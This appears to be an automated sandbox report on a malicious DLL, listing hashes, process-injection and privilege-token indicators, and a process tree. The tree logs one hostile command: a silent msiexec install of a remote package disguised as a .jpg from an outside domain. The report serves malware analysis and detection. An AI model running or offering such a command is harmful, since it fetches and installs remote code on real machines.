Analysis
max time kernel: 61s
max time network: 126s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-07-2022 17:23
Behavioral task: behavioral1
Sample: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Resource: win7-20220715-en
5 signatures, 150 seconds

Behavioral task: behavioral2
Sample: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Resource: win10v2004-20220721-en
4 signatures, 150 seconds
General
Target: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Size: 5KB
MD5: f768a1ec913aea0915bcc20c17896be3
SHA1: a362956664379ff9860a3c56fb1daf6e000220c4
SHA256: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a
SHA512: 9fa8de6d9c4736dd0300e334137d3e60e42860f7b70dd452b35d515b3d7ebca0ef942d3bc65613d6be8e91a4f93c4c58b4e81d99649a9941cfafb46185f6dc9d
Score: 7/10
Malware Config
Signatures
Use of msiexec (install) with remote resource (1 IoC)
Processes:
  pid   process
  4420  msiexec.exe

Suspicious use of SetThreadContext (1 IoC)
Processes:
  description                          pid  process       target process
  PID 808 set thread context of 1196   808  rundll32.exe  rundll32.exe

Suspicious use of AdjustPrivilegeToken (32 IoCs)
Processes:
  description                           pid   process
  Token: SeShutdownPrivilege            4420  msiexec.exe
  Token: SeIncreaseQuotaPrivilege       4420  msiexec.exe
  Token: SeSecurityPrivilege            4464  msiexec.exe
  Token: SeCreateTokenPrivilege         4420  msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege  4420  msiexec.exe
  Token: SeLockMemoryPrivilege          4420  msiexec.exe
  Token: SeIncreaseQuotaPrivilege       4420  msiexec.exe
  Token: SeMachineAccountPrivilege      4420  msiexec.exe
  Token: SeTcbPrivilege                 4420  msiexec.exe
  Token: SeSecurityPrivilege            4420  msiexec.exe
  Token: SeTakeOwnershipPrivilege       4420  msiexec.exe
  Token: SeLoadDriverPrivilege          4420  msiexec.exe
  Token: SeSystemProfilePrivilege       4420  msiexec.exe
  Token: SeSystemtimePrivilege          4420  msiexec.exe
  Token: SeProfSingleProcessPrivilege   4420  msiexec.exe
  Token: SeIncBasePriorityPrivilege     4420  msiexec.exe
  Token: SeCreatePagefilePrivilege      4420  msiexec.exe
  Token: SeCreatePermanentPrivilege     4420  msiexec.exe
  Token: SeBackupPrivilege              4420  msiexec.exe
  Token: SeRestorePrivilege             4420  msiexec.exe
  Token: SeShutdownPrivilege            4420  msiexec.exe
  Token: SeDebugPrivilege               4420  msiexec.exe
  Token: SeAuditPrivilege               4420  msiexec.exe
  Token: SeSystemEnvironmentPrivilege   4420  msiexec.exe
  Token: SeChangeNotifyPrivilege        4420  msiexec.exe
  Token: SeRemoteShutdownPrivilege      4420  msiexec.exe
  Token: SeUndockPrivilege              4420  msiexec.exe
  Token: SeSyncAgentPrivilege           4420  msiexec.exe
  Token: SeEnableDelegationPrivilege    4420  msiexec.exe
  Token: SeManageVolumePrivilege        4420  msiexec.exe
  Token: SeImpersonatePrivilege         4420  msiexec.exe
  Token: SeCreateGlobalPrivilege        4420  msiexec.exe

Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description                       pid   process       target process
  PID 4328 wrote to memory of 808   4328  rundll32.exe  rundll32.exe
  PID 4328 wrote to memory of 808   4328  rundll32.exe  rundll32.exe
  PID 4328 wrote to memory of 808   4328  rundll32.exe  rundll32.exe
  PID 808 wrote to memory of 1196   808   rundll32.exe  rundll32.exe
  PID 808 wrote to memory of 1196   808   rundll32.exe  rundll32.exe
  PID 808 wrote to memory of 1196   808   rundll32.exe  rundll32.exe
  PID 808 wrote to memory of 1196   808   rundll32.exe  rundll32.exe
  PID 1196 wrote to memory of 4420  1196  rundll32.exe  msiexec.exe
  PID 1196 wrote to memory of 4420  1196  rundll32.exe  msiexec.exe
  PID 1196 wrote to memory of 4420  1196  rundll32.exe  msiexec.exe
Processes (process tree, indented by depth)

C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#1
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#1
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\rundll32.exe
      Command line: rundll32.exe
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\msiexec.exe
        Command line: msiexec /i https://dl.eqwauemt.com/Downupdatesoftmakerup.jpg /q
        - Use of msiexec (install) with remote resource
        - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken